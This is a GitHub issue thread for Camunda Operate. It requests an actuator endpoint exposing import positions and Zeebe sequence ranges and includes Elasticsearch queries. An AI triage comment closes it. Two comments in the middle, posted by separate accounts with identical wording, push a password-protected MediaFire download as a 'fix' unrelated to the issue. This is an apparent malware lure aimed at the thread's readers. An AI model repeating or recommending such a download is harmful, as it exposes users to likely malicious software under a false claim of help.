### ISSUE TITLE
Add actuator endpoint about import state

### ISSUE THREAD

**Issue by ralfpuchert** [camunda/camunda#21659]
### Description

In order to get detailed information about the state of import for incidents and support cases Operate can provide an actuator endpoint.

#### Needed information for import
 
* Operate import positions from import-position index as json
* Operate post importer positions from post-importer-queue as json
* Zeebe min, max sequence values for each zeebe-record index as json

### TODO

- [ ] Add actuator endpoint `/actuator/import-state`
- [ ] Return information like described above as json 

### Additional Information

* Get Operate import status: `GET /operate-import-position*/_search?size=100&pretty=true`
* Get Operate post import status: `GET /operate-post-importer-queue*/_search?size=100&pretty=true`
* Get Zeebe min/max sequence for import types: `POST /zeebe-record*/_search'`

```json
{
  "size": 0,
  "aggs": {
    "value_types": {
      "terms": {
        "field": "valueType",
        "size": 20
      },
      "aggs": {
        "partitions": {
          "terms": {
            "field": "partitionId"
          },
          "aggs": {
            "min_sequence": {
              "min": {
                "field": "sequence"
              }
            },
            "max_sequence": {
              "max": {
                "field": "sequence"
              }
            }
          }
        }
      }
    }
  }
}
```

---------------------------------------------------------------------------------------------

### Acceptance Criteria

- [ ] Checked if the specific data needs to be provided for the QA process

### Definition of Ready - Checklist

- [ ] The issue has a meaningful title, description and testable acceptance criteria
- [ ] If documentation needs to be updated, an issue is created in the [camunda-docs](https://github.com/camunda/camunda-docs) repo, and the issue is added to our Operate project board.
- [ ] If HELM charts need to be updated, an issue is created in the [camunda-platform-heml](https://github.com/camunda/camunda-platform-helm) repo, and the issue is added to our Operate project board.
- [ ] Potential Security risks have been considered
- [ ] Cross-team dependencies have been considered

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by marcosgvieira** [comment]
### 🧭 Triage Assessment

| Field | Value |
|------|-------|
| **Work type** | TASK_TOIL_NON_FEATURE |
| **Impact** | ⚠️ Mid |
| **When** | ⚠️ Soon |
| **Confidence** | 0.95 |

---

### 📝 Rationale

This is a new operational diagnostic endpoint for import-state visibility, not a bug; Operate importers are within Core Features ownership.  It provides a clear workflow and troubleshooting improvement, but the issue does not indicate active blocking, so MEDIUM impact and SOON timing are appropriate. 

---

🤖 _This issue was automatically triaged by an AI-based system as part of the Core Features triage workflow._

✋ **Want a human review?**
If you believe this assessment is incorrect or needs adjustment, feel free to update the details or request a manual triage by adding the **`triage:manual`** label.
